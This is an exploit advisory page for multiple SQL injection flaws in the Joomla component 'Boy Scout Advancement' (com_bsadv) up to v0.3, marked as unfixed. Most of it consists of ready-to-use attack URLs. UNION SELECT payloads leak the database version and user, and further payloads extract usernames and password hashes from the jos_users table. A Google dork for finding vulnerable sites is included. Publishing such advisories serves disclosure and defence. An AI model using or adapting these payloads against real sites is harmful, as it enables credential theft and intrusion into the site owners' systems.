Joomla Component 'Boy Scout Advancement' <= v-0.3 Multiple SQL Injection

2009-05-25 / 2009-05-26
Credit: YEnH4ckEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

------------------------------------------------------------------------------------------------------------ MULTIPLE SQL INJECTION VULNERABILITIES --Joomla Component 'Boy Scout Advancement' <= v-0.3 (com_bsadv)--> ------------------------------------------------------------------------------------------------------------ CMS INFORMATION: -->WEB: http://bsadv.sourceforge.net/ -->DOWNLOAD: http://bsadv.sourceforge.net/ -->DEMO: N/A -->CATEGORY: Joomla/Component -->DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement data for Boy Scout Troops in the United States... -->RELEASED: 2009-02-01 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK --> inurl:"?option=com_bsadv" -->CATEGORY: SQL INJECTION -->AFFECT VERSION: <= 0.3 -->Discovered Bug date: 2009-05-25 -->Reported Bug date: 2009-05-25 -->Fixed bug date: Not fixed -->Info patch: Not fixed -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ############################ /////////////////////////// SQL INJECTION VULNS (SQLi): /////////////////////////// ############################ <<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> ------------------- PROOFS OF CONCEPT: ------------------- [++] GET var --> 'id' ~~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23 [++] GET var --> 'id' ~~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+database(),version()%23&Itemid=57 [++[Return]++] ~~~~~> User, version or database. ----------- EXPLOITS: ----------- ~~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23 [++[Return]++] ~~~~~> Username:::password id=62 ~~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57 [++[Return]++] ~~~~~> Username and password id=62 ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************##

References:

http://seclists.org/bugtraq/2009/May/0240.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top